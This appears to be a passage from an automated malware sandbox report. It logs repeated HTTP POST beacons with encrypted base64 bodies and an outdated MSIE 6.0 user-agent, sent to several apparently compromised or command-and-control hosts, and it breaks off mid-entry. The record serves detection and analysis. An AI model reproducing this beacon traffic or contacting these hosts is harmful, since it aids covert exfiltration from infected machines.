C2zNjbiTX9A1JTQ1O8McU6vPvgcASau8bKJfOQ5OFmRYympHFjNpoOeFwHt/2qsyH2w39E7TI+EtWxhRKIEmUYt9ngP33dox3znAebi1O70MjgDi64NPXTH2jiIdwm0C8sUhu0hjfuhw7lKCBQYOGiKDthaNEKjAA1DAEsGsnriMBXhqNTd8JO82Azjr6tbBVF8KKwPEnSUfjQBYaWrHgVdEsZQJMxncV7C6zT7466uQum05PKQvphy8A3wnBxR7kRyYS9Tc1EgOKSS47trO7j0jDlmCFiUmCYR8MXV3g+7/WPgG8V4qQsAk7cYQqXdWq9HcQr3hdYq/usekkCZff0wxuykp8gbjd4KZHXpa7g8lqtytW3SjEeXmHDHrlyo/wVxXo9BK1mIewhamxgY+aI8nn0Mw5UipJmmz16BZ9oKJg96Fz8+oYnE+6S+k4GoD0IdN8PaxfOkxcTNVtq2CCCim204GAWtu1l41gIzHtXJLmsotbUoC/a6/O2U4ZG+JK9YqYduOYVKthbUivsAdrr0MKa6DV32lT8LHp12O/WG/UiC3iGEddfZu8mE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 47 55 63 4d 6a 43 4b 46 58 39 41 4d 6d 62 68 75 6c 55 4b 6d 34 4b 56 47 70 31 65 79 72 30 6f 4a 64 73 31 48 41 64 4b 61 4f 45 54 57 73 4f 31 71 6f 51 50 44 57 4b 54 30 57 77 56 77 72 74 4f 32 70 39 4b 68 75 56 55 65 57 52 31 70 63 64 55 65 36 31 50 77 4d 48 4a 2b 6b 45 67 57 4e 47 6d 37 48 65 62 48 49 46 74 37 38 51 4e 49 59 39 4b 71 6e 6d 36 32 56 64 6f 33 37 54 70 2f 30 42 41 59 44 72 47 50 56 36 66 4d 34 38 51 51 57 66 2b 34 56 39 36 53 76 77 50 7a 36 37 41 76 42 42 55 49 6c 7a 77 55 75 4d 6a 38 37 49 42 50 75 6f 52 33 6e 71 63 55 35 79 6f 5a 35 75 6d 71 4c 4c 74 57 65 78 4b 32 6d 53 46 34 65 67 38 45 65 4b 4e 6d 33 69 44 39 4a 71 78 4a 73 2b 78 70 65 47 42 4d 4f 61 4b 7a 43 42 56 62 6a 33 75 2f 4e 2f 62 4c 2b 41 63 4f 76 64 47 44 62 34 34 4a 38 50 53 36 54 31 36 38 37 2f 4a 36 61 39 70 66 61 6c 6b 4c 69 7a 43 30 68 72 4a 30 76 61 39 70 4c 65 57 2f 77 6f 30 63 6a 61 44 70 36 6d 6a 5a 75 39 2b 71 6a 2b 70 4f 45 50 69 39 71 38 4e 34 63 57 56 35 53 41 34 49 70 57 6a 4e 53 53 65 74 37 57 71 43 74 4a 4c 56 63 69 36 61 67 74 64 6d 55 6a 52 44 64 64 4f 74 46 61 79 55 61 63 54 38 57 73 51 69 4e 41 56 51 45 59 4a 62 42 78 64 6f 38 45 64 75 75 54 4b 49 42 62 65 45 30 57 65 69 46 67 37 43 52 63 6f 62 48 51 68 4c 35 2b 44 2b 47 36 43 68 57 48 32 6e 6b 62 34 79 47 50 4c 66 72 6e 30 41 50 6f 54 4d 56 52 61 58 45 6c 4c 73 48 41 38 74 78 6c 54 4b 4f 66 6f 70 4a 74 7a 61 4b 33 35 56 56 68 4e 71 67 41 54 70 2b 4c 79 79 7a 32 39 79 48 50 52 77 59 33 4f 73 52 6b 4b 57 6c 54 46 55 42 58 42 79 39 48 2b 4f 32 68 76 44 56 76 6e 65 4c 32 4b 61 38 46 30 52 58 55 33 31 70 4b 4c 69 37 38 57 56 69 7a 34 62 42 65 6a 48 6c 75 67 6f 6a 6d 63 69 46 4c 6f 77 6a 51 3d 3d Data Ascii: GUcMjCKFX9AMmbhulUKm4KVGp1eyr0oJds1HAdKaOETWsO1qoQPDWKT0WwVwrtO2p9KhuVUeWR1pcdUe61PwMHJ+kEgWNGm7HebHIFt78QNIY9Kqnm62Vdo37Tp/0BAYDrGPV6fM48QQWf+4V96SvwPz67AvBBUIlzwUuMj87IBPuoR3nqcU5yoZ5umqLLtWexK2mSF4eg8EeKNm3iD9JqxJs+xpeGBMOaKzCBVbj3u/N/bL+AcOvdGDb44J8PS6T1687/J6a9pfalkLizC0hrJ0va9pLeW/wo0cjaDp6mjZu9+qj+pOEPi9q8N4cWV5SA4IpWjNSSet7WqCtJLVci6agtdmUjRDddOtFayUacT8WsQiNAVQEYJbBxdo8EduuTKIBbeE0WeiFg7CRcobHQhL5+D+G6ChWH2nkb4yGPLfrn0APoTMVRaXElLsHA8txlTKOfopJtzaK35VVhNqgATp+Lyyz29yHPRwY3OsRkKWlTFUBXBy9H+O2hvDVvneL2Ka8F0RXU31pKLi78WViz4bBejHlugojmciFLowjQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 72 7a 74 5a 6c 43 54 4b 58 39 43 57 49 64 4a 4c 76 34 39 61 75 66 65 49 45 62 66 63 62 62 63 58 6d 4f 6d 6c 37 77 71 65 56 77 42 58 55 36 4a 34 57 6c 66 42 51 36 66 51 70 6a 48 72 5a 77 71 57 54 4d 61 7a 32 2f 67 35 79 48 32 63 30 2b 78 56 4d 57 4c 4e 63 61 64 7a 74 37 2b 54 4f 42 59 5a 48 68 68 55 6e 56 49 31 55 4b 32 76 63 32 51 71 45 34 68 6a 57 36 78 71 50 54 7a 32 47 64 58 59 6b 6f 7a 58 35 31 37 52 79 4c 42 54 31 69 77 44 4d 2b 65 59 53 68 65 56 62 61 75 39 2f 4a 35 58 62 51 68 73 33 54 65 4f 43 58 63 36 30 4e 75 56 5a 4e 62 46 71 48 35 77 6b 39 46 74 4f 79 42 50 61 38 30 59 6a 63 47 6a 2b 71 35 42 4c 51 62 50 38 33 43 32 6b 53 53 70 2b 47 76 44 35 4f 49 39 4b 7a 53 39 4d 33 61 45 55 30 70 72 45 52 30 4f 62 65 50 54 6e 6f 35 32 6f 51 4b 2b 63 66 57 31 48 4b 5a 48 2b 35 48 41 69 37 77 53 68 4e 76 54 6b 35 49 72 47 4a 33 4c 56 47 67 39 2b 65 33 36 4b 66 4f 70 39 58 6d 49 4e 68 6a 6d 61 30 56 45 39 2f 6c 6a 37 48 4e 39 69 2b 64 53 6e 55 71 51 70 4d 34 34 51 52 70 6b 7a 51 6b 44 65 50 64 43 77 39 52 56 78 4c 6a 61 75 34 5a 77 68 6f 7a 45 53 4c 49 7a 38 56 72 78 57 63 43 4b 35 49 4f 2b 36 63 6a 30 66 4f 2b 44 68 51 32 76 76 4e 64 42 64 67 37 31 6e 36 45 35 64 73 6e 42 6a 52 45 2b 39 43 79 46 74 53 58 6b 78 46 37 50 4b 6d 6e 72 43 54 6f 38 59 53 55 41 51 44 63 34 5a 55 2b 45 44 2f 69 46 79 6c 56 56 58 35 49 56 54 76 30 45 51 44 58 7a 47 62 51 79 68 57 6e 6a 71 39 4b 71 70 43 34 33 48 54 42 54 57 54 45 48 62 72 58 77 30 76 65 73 6e 56 32 64 77 44 79 53 51 37 69 61 45 31 2b 35 6e 42 41 6b 77 63 56 32 5a 47 59 2b 63 32 4b 71 34 34 39 64 52 4f 54 64 39 51 54 52 56 30 50 58 56 68 4b 31 79 63 71 58 55 75 52 4d 58 4b 4b 77 52 59 75 71 48 39 30 34 56 47 68 6a 41 43 2b 38 57 50 56 73 64 35 68 79 74 56 56 69 34 51 3d 3d Data Ascii: rztZlCTKX9CWIdJLv49aufeIEbfcbbcXmOml7wqeVwBXU6J4WlfBQ6fQpjHrZwqWTMaz2/g5yH2c0+xVMWLNcadzt7+TOBYZHhhUnVI1UK2vc2QqE4hjW6xqPTz2GdXYkozX517RyLBT1iwDM+eYSheVbau9/J5XbQhs3TeOCXc60NuVZNbFqH5wk9FtOyBPa80YjcGj+q5BLQbP83C2kSSp+GvD5OI9KzS9M3aEU0prER0ObePTno52oQK+cfW1HKZH+5HAi7wShNvTk5IrGJ3LVGg9+e36KfOp9XmINhjma0VE9/lj7HN9i+dSnUqQpM44QRpkzQkDePdCw9RVxLjau4ZwhozESLIz8VrxWcCK5IO+6cj0fO+DhQ2vvNdBdg71n6E5dsnBjRE+9CyFtSXkxF7PKmnrCTo8YSUAQDc4ZU+ED/iFylVVX5IVTv0EQDXzGbQyhWnjq9KqpC43HTBTWTEHbrXw0vesnV2dwDySQ7iaE1+5nBAkwcV2ZGY+c2Kq449dROTd9QTRV0PXVhK1ycqXUuRMXKKwRYuqH904VGhjAC+8WPVsd5hytVVi4Q==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 4c 53 33 57 67 39 31 41 58 39 44 44 4c 68 5a 77 46 45 79 79 47 68 5a 6c 32 52 79 4c 4d 63 74 6a 59 64 2f 70 45 66 32 39 33 65 70 32 59 6a 32 62 7a 64 73 7a 78 72 33 70 45 6c 67 38 78 2b 5a 4f 4e 46 47 57 63 63 2f 79 35 69 4e 61 33 43 45 38 4c 4a 4f 66 62 6c 42 67 4d 56 46 70 6a 33 6c 6f 64 4a 54 33 55 71 68 68 47 49 47 58 73 50 4f 72 4b 59 7a 51 38 32 6e 4f 58 2f 31 78 72 6a 6e 55 74 57 63 30 38 39 37 34 6f 4b 30 59 73 53 71 63 49 7a 36 5a 56 61 67 31 77 38 6c 72 48 44 74 65 74 64 66 46 49 33 33 2b 4b 42 53 57 66 45 68 4b 67 39 78 51 6c 49 6a 69 6f 62 55 70 44 38 74 67 70 6d 79 41 74 68 72 43 6a 70 6d 62 6d 6b 73 6f 7a 2b 4d 68 30 78 51 69 30 66 6d 6f 37 6f 56 69 53 31 49 58 4b 4b 43 4b 77 76 72 42 36 56 6a 69 6c 41 52 59 6f 62 41 79 65 4f 59 45 6f 48 73 4b 34 48 30 7a 6d 59 4e 67 72 51 68 2f 57 44 73 41 6e 48 79 6d 69 58 47 69 68 57 59 6b 76 44 44 77 45 46 35 71 64 48 42 56 65 6a 54 37 76 37 37 52 64 61 4a 67 64 54 37 70 49 30 32 50 75 6c 56 6d 35 39 56 4b 6e 6d 75 4b 48 4d 34 62 31 68 6b 57 37 59 57 64 62 73 41 42 75 63 69 54 4c 56 2f 50 71 6a 62 73 46 31 75 34 5a 38 33 6a 4b 38 62 63 51 73 6c 77 4b 48 6f 4f 6d 42 64 46 69 59 4d 68 32 65 51 6a 37 78 75 6d 6a 41 50 47 6f 69 73 4d 4f 4c 4b 74 34 4c 33 43 52 76 47 55 2b 65 4c 7a 65 4d 57 6d 7a 47 59 68 76 74 46 4b 56 59 58 78 4e 45 39 6b 2f 46 75 6c 49 6f 65 2f 4d 6e 54 66 70 4f 34 39 48 30 67 66 77 68 55 6d 2b 75 42 30 6a 70 45 7a 52 72 68 62 6b 4c 33 4c 73 46 77 62 62 2b 7a 6d 4e 53 79 79 61 43 39 70 6c 73 43 58 36 4a 69 6d 44 4f 31 35 76 6b 75 45 4d 67 49 65 52 52 6c 6f 56 64 47 6d 4f 47 62 56 50 6b 67 69 37 67 4f 51 56 71 65 75 35 77 3d 3d Data Ascii: LS3Wg91AX9DDLhZwFEyyGhZl2RyLMctjYd/pEf293ep2Yj2bzdszxr3pElg8x+ZONFGWcc/y5iNa3CE8LJOfblBgMVFpj3lodJT3UqhhGIGXsPOrKYzQ82nOX/1xrjnUtWc08974oK0YsSqcIz6ZVag1w8lrHDtetdfFI33+KBSWfEhKg9xQlIjiobUpD8tgpmyAthrCjpmbmksoz+Mh0xQi0fmo7oViS1IXKKCKwvrB6VjilARYobAyeOYEoHsK4H0zmYNgrQh/WDsAnHymiXGihWYkvDDwEF5qdHBVejT7v77RdaJgdT7pI02PulVm59VKnmuKHM4b1hkW7YWdbsABuciTLV/PqjbsF1u4Z83jK8bcQslwKHoOmBdFiYMh2eQj7xumjAPGoisMOLKt4L3CRvGU+eLzeMWmzGYhvtFKVYXxNE9k/FulIoe/MnTfpO49H0gfwhUm+uB0jpEzRrhbkL3LsFwbb+zmNSyyaC9plsCX6JimDO15vkuEMgIeRRloVdGmOGbVPkgi7gOQVqeu5w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 47 55 63 4d 6a 43 4b 46 58 39 41 4d 6d 62 68 75 6c 55 4b 6d 34 4b 56 47 70 31 65 79 72 30 6f 4a 64 73 31 48 41 64 4b 61 4f 45 54 57 73 4f 31 71 6f 51 50 44 57 4b 54 30 57 77 56 77 72 74 4f 32 70 39 4b 68 75 56 55 65 57 52 31 70 63 64 55 65 36 31 50 77 4d 48 4a 2b 6b 45 67 57 4e 47 6d 37 48 65 62 48 49 46 74 37 38 51 4e 49 59 39 4b 71 6e 6d 36 32 56 64 6f 33 37 54 70 2f 30 42 41 59 44 72 47 50 56 36 66 4d 34 38 51 51 57 66 2b 34 56 39 36 53 76 77 50 7a 36 37 41 76 42 42 55 49 6c 7a 77 55 75 4d 6a 38 37 49 42 50 75 6f 52 33 6e 71 63 55 35 79 6f 5a 35 75 6d 71 4c 4c 74 57 65 78 4b 32 6d 53 46 34 65 67 38 45 65 4b 4e 6d 33 69 44 39 4a 71 78 4a 73 2b 78 70 65 47 42 4d 4f 61 4b 7a 43 42 56 62 6a 33 75 2f 4e 2f 62 4c 2b 41 63 4f 76 64 47 44 62 34 34 4a 38 50 53 36 54 31 36 38 37 2f 4a 36 61 39 70 66 61 6c 6b 4c 69 7a 43 30 68 72 4a 30 76 61 39 70 4c 65 57 2f 77 6f 30 63 6a 61 44 70 36 6d 6a 5a 75 39 2b 71 6a 2b 70 4f 45 50 69 39 71 38 4e 34 63 57 56 35 53 41 34 49 70 57 6a 4e 53 53 65 74 37 57 71 43 74 4a 4c 56 63 69 36 61 67 74 64 6d 55 6a 52 44 64 64 4f 74 46 61 79 55 61 63 54 38 57 73 51 69 4e 41 56 51 45 59 4a 62 42 78 64 6f 38 45 64 75 75 54 4b 49 42 62 65 45 30 57 65 69 46 67 37 43 52 63 6f 62 48 51 68 4c 35 2b 44 2b 47 36 43 68 57 48 32 6e 6b 62 34 79 47 50 4c 66 72 6e 30 41 50 6f 54 4d 56 52 61 58 45 6c 4c 73 48 41 38 74 78 6c 54 4b 4f 66 6f 70 4a 74 7a 61 4b 33 35 56 56 68 4e 71 67 41 54 70 2b 4c 79 79 7a 32 39 79 48 50 52 77 59 33 4f 73 52 6b 4b 57 6c 54 46 55 42 58 42 79 39 48 2b 4f 32 68 76 44 56 76 6e 65 4c 32 4b 61 38 46 30 52 58 55 33 31 70 4b 4c 69 37 38 57 56 69 7a 34 62 42 65 6a 48 6c 75 67 6f 6a 6d 63 69 46 4c 6f 77 6a 51 3d 3d Data Ascii: GUcMjCKFX9AMmbhulUKm4KVGp1eyr0oJds1HAdKaOETWsO1qoQPDWKT0WwVwrtO2p9KhuVUeWR1pcdUe61PwMHJ+kEgWNGm7HebHIFt78QNIY9Kqnm62Vdo37Tp/0BAYDrGPV6fM48QQWf+4V96SvwPz67AvBBUIlzwUuMj87IBPuoR3nqcU5yoZ5umqLLtWexK2mSF4eg8EeKNm3iD9JqxJs+xpeGBMOaKzCBVbj3u/N/bL+AcOvdGDb44J8PS6T1687/J6a9pfalkLizC0hrJ0va9pLeW/wo0cjaDp6mjZu9+qj+pOEPi9q8N4cWV5SA4IpWjNSSet7WqCtJLVci6agtdmUjRDddOtFayUacT8WsQiNAVQEYJbBxdo8EduuTKIBbeE0WeiFg7CRcobHQhL5+D+G6ChWH2nkb4yGPLfrn0APoTMVRaXElLsHA8txlTKOfopJtzaK35VVhNqgATp+Lyyz29yHPRwY3OsRkKWlTFUBXBy9H+O2hvDVvneL2Ka8F0RXU31pKLi78WViz4bBejHlugojmciFLowjQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 30 57 78 69 38 49 55 58 61 39 41 62 79 74 6a 64 72 43 4d 37 79 66 35 35 6a 6e 4a 54 73 66 6e 75 69 51 79 33 4a 49 52 48 67 6b 50 51 74 68 33 42 57 35 7a 74 6e 68 7a 33 49 37 54 4c 52 7a 75 74 42 37 38 2b 4d 56 36 6c 75 72 35 71 33 50 4e 34 61 51 43 50 30 6d 51 33 4d 51 34 46 65 69 6b 2b 44 58 62 59 73 33 34 31 68 59 74 30 4f 45 4f 77 37 78 73 51 42 72 47 4b 64 75 47 4b 32 37 45 4c 44 37 38 57 75 72 39 6f 6e 54 62 41 66 54 67 62 61 34 45 46 36 5a 66 4b 2f 43 76 64 71 70 5a 4c 64 67 55 74 55 2b 74 31 71 48 6f 4c 4f 42 77 34 61 59 35 68 44 58 44 35 30 45 32 6e 4e 31 47 43 77 4b 4c 6b 42 6a 62 78 50 78 43 77 5a 78 51 6f 34 59 34 62 48 44 6b 75 44 37 76 2b 63 6d 79 6d 65 4d 64 36 59 42 33 42 6d 76 73 67 79 76 6b 4c 77 49 6c 32 6b 38 71 49 51 5a 31 77 33 65 4f 79 75 35 55 44 39 76 54 45 67 39 6f 39 6d 59 4a 72 47 47 61 58 5a 57 59 47 77 59 4e 53 75 55 70 71 32 43 50 65 31 70 59 44 2f 57 5a 51 39 47 59 39 6b 49 43 73 75 59 67 58 62 52 4a 2b 34 54 71 65 64 68 67 34 41 72 67 4f 2b 42 34 77 6a 79 70 63 64 43 49 75 53 57 37 38 51 63 5a 53 53 51 2b 63 44 69 44 47 47 71 58 37 77 31 71 71 48 45 76 77 51 6f 77 69 4b 73 61 42 4a 6a 34 2f 57 7a 63 48 32 6a 49 6a 47 7a 4e 4a 4c 6a 43 65 6a 53 2f 64 6b 69 79 43 54 6e 7a 31 74 4b 51 78 4b 49 35 72 6b 6f 75 35 52 56 68 70 55 6a 7a 57 70 4d 49 35 58 4c 39 66 4f 33 45 31 4e 4f 37 39 70 68 30 30 6e 65 71 42 58 64 62 46 41 31 79 48 43 6a 31 43 46 57 71 55 44 57 47 79 77 6e 78 30 6e 64 77 6f 4a 52 30 7a 36 4f 68 66 47 2b 36 2b 57 56 6b 6f 79 71 79 37 30 71 2f 4d 6e 4a 43 43 4d 65 37 49 4b 58 63 4c 44 49 70 4e 68 73 33 49 6d 56 54 6d 39 69 30 7a 48 62 4f 67 56 51 6a 43 79 63 49 63 50 77 5a 51 72 33 4f 4f 4b 65 6c 49 2b 50 6d 58 37 4b 61 51 58 64 6f 6d 30 51 54 71 6f 50 2b 34 54 4e 74 6a Data Ascii: 0Wxi8IUXa9AbytjdrCM7yf55jnJTsfnuiQy3JIRHgkPQth3BW5ztnhz3I7TLRzutB78+MV6lur5q3PN4aQCP0mQ3MQ4Feik+DXbYs341hYt0OEOw7xsQBrGKduGK27ELD78Wur9onTbAfTgba4EF6ZfK/CvdqpZLdgUtU+t1qHoLOBw4aY5hDXD50E2nN1GCwKLkBjbxPxCwZxQo4Y4bHDkuD7v+cmymeMd6YB3BmvsgyvkLwIl2k8qIQZ1w3eOyu5UD9vTEg9o9mYJrGGaXZWYGwYNSuUpq2CPe1pYD/WZQ9GY9kICsuYgXbRJ+4Tqedhg4ArgO+B4wjypcdCIuSW78QcZSSQ+cDiDGGqX7w1qqHEvwQowiKsaBJj4/WzcH2jIjGzNJLjCejS/dkiyCTnz1tKQxKI5rkou5RVhpUjzWpMI5XL9fO3E1NO79ph00neqBXdbFA1yHCj1CFWqUDWGywnx0ndwoJR0z6OhfG+6+WVkoyqy70q/MnJCCMe7IKXcLDIpNhs3ImVTm9i0zHbOgVQjCycIcPwZQr3OOKelI+PmX7KaQXdom0QTqoP+4TNtj
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 59 49 36 31 32 70 4b 7a 63 74 41 43 76 42 47 52 52 54 30 51 44 35 55 75 67 59 48 69 52 6a 57 69 35 6d 4c 37 50 58 64 6f 54 76 4f 70 32 7a 36 73 61 45 57 65 45 66 46 39 45 6d 54 59 62 49 6d 33 4f 4e 72 4a 53 32 6b 32 33 62 76 77 45 4d 57 67 32 41 46 57 34 5a 53 59 7a 72 49 4e 43 44 55 69 37 6b 32 43 65 75 55 45 4e 59 78 67 53 30 49 43 79 79 79 74 7a 74 36 75 42 67 78 73 2b 75 4c 67 57 74 66 77 52 67 65 49 68 2f 66 55 43 78 37 42 78 6f 58 52 7a 34 34 45 4e 75 35 7a 34 32 4b 59 2f 33 59 78 4a 66 53 49 42 33 7a 6a 66 34 32 74 36 4d 79 64 53 39 6b 6f 38 66 65 2b 66 2b 6e 63 4a 6f 76 74 36 49 7a 75 59 76 56 36 65 73 6a 54 53 57 61 7a 4e 56 36 48 73 74 61 55 57 31 71 6b 6b 6c 37 45 4c 73 55 4b 69 33 61 55 37 50 70 54 4e 61 31 46 72 52 77 50 73 6f 32 43 6a 49 34 49 39 75 4b 47 4b 47 6d 64 6a 4e 77 61 2f 76 78 49 6d 2b 42 51 5a 45 6e 31 42 65 43 65 41 53 39 65 51 53 34 71 6b 32 39 70 47 7a 54 48 65 74 63 6b 51 33 73 79 5a 71 7a 49 32 32 77 51 55 52 63 7a 2f 4c 73 4a 4b 39 36 58 79 34 6e 61 4f 33 58 7a 73 66 68 76 56 67 50 53 46 78 44 66 44 6f 37 54 31 4a 67 4a 64 38 4e 54 73 56 61 61 59 76 6f 2b 4b 6d 4f 33 4d 41 6d 30 74 57 68 64 62 4e 76 79 42 61 35 6e 6c 7a 56 75 33 64 44 54 4f 73 72 52 62 4a 75 42 34 4a 32 48 46 6d 45 74 39 31 71 55 46 33 2f 65 71 39 4d 45 39 61 63 47 46 56 49 71 57 30 47 57 7a 76 4a 30 62 63 7a 48 35 45 65 58 38 33 39 51 2f 6b 4a 55 6d 32 2f 58 4b 31 34 78 53 53 48 47 64 42 6e 4c 64 50 43 6c 61 59 58 58 73 76 4f 45 78 53 49 4d 48 34 61 5a 71 73 61 4d 64 4c 7a 57 30 42 33 6a 63 31 34 49 70 68 43 39 31 44 53 6a 4b 2f 6c 30 35 52 56 55 54 36 36 75 43 4f 58 6d Data Ascii: YI612pKzctACvBGRRT0QD5UugYHiRjWi5mL7PXdoTvOp2z6saEWeEfF9EmTYbIm3ONrJS2k23bvwEMWg2AFW4ZSYzrINCDUi7k2CeuUENYxgS0ICyyytzt6uBgxs+uLgWtfwRgeIh/fUCx7BxoXRz44ENu5z42KY/3YxJfSIB3zjf42t6MydS9ko8fe+f+ncJovt6IzuYvV6esjTSWazNV6HstaUW1qkkl7ELsUKi3aU7PpTNa1FrRwPso2CjI4I9uKGKGmdjNwa/vxIm+BQZEn1BeCeAS9eQS4qk29pGzTHetckQ3syZqzI22wQURcz/LsJK96Xy4naO3XzsfhvVgPSFxDfDo7T1JgJd8NTsVaaYvo+KmO3MAm0tWhdbNvyBa5nlzVu3dDTOsrRbJuB4J2HFmEt91qUF3/eq9ME9acGFVIqW0GWzvJ0bczH5EeX839Q/kJUm2/XK14xSSHGdBnLdPClaYXXsvOExSIMH4aZqsaMdLzW0B3jc14IphC91DSjK/l05RVUT66uCOXm
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 4c 53 33 57 67 39 31 41 58 39 44 44 4c 68 5a 77 46 45 79 79 47 68 5a 6c 32 52 79 4c 4d 63 74 6a 59 64 2f 70 45 66 32 39 33 65 70 32 59 6a 32 62 7a 64 73 7a 78 72 33 70 45 6c 67 38 78 2b 5a 4f 4e 46 47 57 63 63 2f 79 35 69 4e 61 33 43 45 38 4c 4a 4f 66 62 6c 42 67 4d 56 46 70 6a 33 6c 6f 64 4a 54 33 55 71 68 68 47 49 47 58 73 50 4f 72 4b 59 7a 51 38 32 6e 4f 58 2f 31 78 72 6a 6e 55 74 57 63 30 38 39 37 34 6f 4b 30 59 73 53 71 63 49 7a 36 5a 56 61 67 31 77 38 6c 72 48 44 74 65 74 64 66 46 49 33 33 2b 4b 42 53 57 66 45 68 4b 67 39 78 51 6c 49 6a 69 6f 62 55 70 44 38 74 67 70 6d 79 41 74 68 72 43 6a 70 6d 62 6d 6b 73 6f 7a 2b 4d 68 30 78 51 69 30 66 6d 6f 37 6f 56 69 53 31 49 58 4b 4b 43 4b 77 76 72 42 36 56 6a 69 6c 41 52 59 6f 62 41 79 65 4f 59 45 6f 48 73 4b 34 48 30 7a 6d 59 4e 67 72 51 68 2f 57 44 73 41 6e 48 79 6d 69 58 47 69 68 57 59 6b 76 44 44 77 45 46 35 71 64 48 42 56 65 6a 54 37 76 37 37 52 64 61 4a 67 64 54 37 70 49 30 32 50 75 6c 56 6d 35 39 56 4b 6e 6d 75 4b 48 4d 34 62 31 68 6b 57 37 59 57 64 62 73 41 42 75 63 69 54 4c 56 2f 50 71 6a 62 73 46 31 75 34 5a 38 33 6a 4b 38 62 63 51 73 6c 77 4b 48 6f 4f 6d 42 64 46 69 59 4d 68 32 65 51 6a 37 78 75 6d 6a 41 50 47 6f 69 73 4d 4f 4c 4b 74 34 4c 33 43 52 76 47 55 2b 65 4c 7a 65 4d 57 6d 7a 47 59 68 76 74 46 4b 56 59 58 78 4e 45 39 6b 2f 46 75 6c 49 6f 65 2f 4d 6e 54 66 70 4f 34 39 48 30 67 66 77 68 55 6d 2b 75 42 30 6a 70 45 7a 52 72 68 62 6b 4c 33 4c 73 46 77 62 62 2b 7a 6d 4e 53 79 79 61 43 39 70 6c 73 43 58 36 4a 69 6d 44 4f 31 35 76 6b 75 45 4d 67 49 65 52 52 6c 6f 56 64 47 6d 4f 47 62 56 50 6b 67 69 37 67 4f 51 56 71 65 75 35 77 3d 3d Data Ascii: LS3Wg91AX9DDLhZwFEyyGhZl2RyLMctjYd/pEf293ep2Yj2bzdszxr3pElg8x+ZONFGWcc/y5iNa3CE8LJOfblBgMVFpj3lodJT3UqhhGIGXsPOrKYzQ82nOX/1xrjnUtWc08974oK0YsSqcIz6ZVag1w8lrHDtetdfFI33+KBSWfEhKg9xQlIjiobUpD8tgpmyAthrCjpmbmksoz+Mh0xQi0fmo7oViS1IXKKCKwvrB6VjilARYobAyeOYEoHsK4H0zmYNgrQh/WDsAnHymiXGihWYkvDDwEF5qdHBVejT7v77RdaJgdT7pI02PulVm59VKnmuKHM4b1hkW7YWdbsABuciTLV/PqjbsF1u4Z83jK8bcQslwKHoOmBdFiYMh2eQj7xumjAPGoisMOLKt4L3CRvGU+eLzeMWmzGYhvtFKVYXxNE9k/FulIoe/MnTfpO49H0gfwhUm+uB0jpEzRrhbkL3LsFwbb+zmNSyyaC9plsCX6JimDO15vkuEMgIeRRloVdGmOGbVPkgi7gOQVqeu5w==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 77 38 54 2b 2b 4a 6e 2f 65 39 43 52 42 47 73 78 71 4f 53 43 4d 44 4c 6a 66 69 48 33 33 4a 56 37 33 59 4d 70 31 55 6a 33 33 62 63 4a 72 2b 71 77 55 65 41 76 67 54 49 48 55 4f 56 6f 37 41 61 64 78 63 4e 6d 4c 77 6c 62 55 33 4d 4e 78 72 6d 67 56 59 58 47 6e 49 71 73 37 5a 72 56 53 6a 34 72 36 5a 6e 72 46 49 37 4b 45 69 7a 2b 6f 63 48 4a 4d 65 70 46 56 74 4e 66 46 39 62 73 79 49 37 61 6c 58 73 66 48 62 66 65 4a 37 55 4d 54 41 2f 52 6e 51 2f 4a 76 2f 73 47 63 51 69 66 30 65 59 57 53 5a 62 4c 42 76 61 31 6d 2f 33 74 31 6d 51 58 63 4b 37 6d 30 72 76 30 6c 39 72 37 41 34 73 67 49 69 7a 2f 38 41 76 69 68 33 33 4b 6c 6c 42 5a 55 78 72 44 64 72 76 4b 48 77 48 6a 67 73 51 4b 6a 64 52 4e 62 34 4a 72 4c 6a 52 75 6a 51 51 34 45 4e 65 74 41 69 4f 72 42 50 39 4b 6f 55 71 6c 33 63 4f 6f 39 74 6c 31 73 37 44 55 78 6e 63 2b 63 2b 4e 2b 49 4d 6d 51 6c 6c 6f 30 5a 41 4f 4a 56 64 30 4e 32 34 4e 54 6b 6d 5a 6c 66 6d 46 69 32 71 47 4f 65 6b 66 79 48 74 48 70 35 57 57 4c 39 71 65 62 49 59 49 4d 44 38 50 36 4d 36 50 70 48 68 6f 66 46 6a 47 42 6a 74 61 68 52 74 72 58 61 67 49 71 49 49 36 68 41 71 47 68 67 45 31 77 7a 74 2f 64 2b 6f 4f 69 50 61 67 4a 65 53 56 5a 4c 38 69 61 69 39 47 47 65 4d 6c 64 65 4f 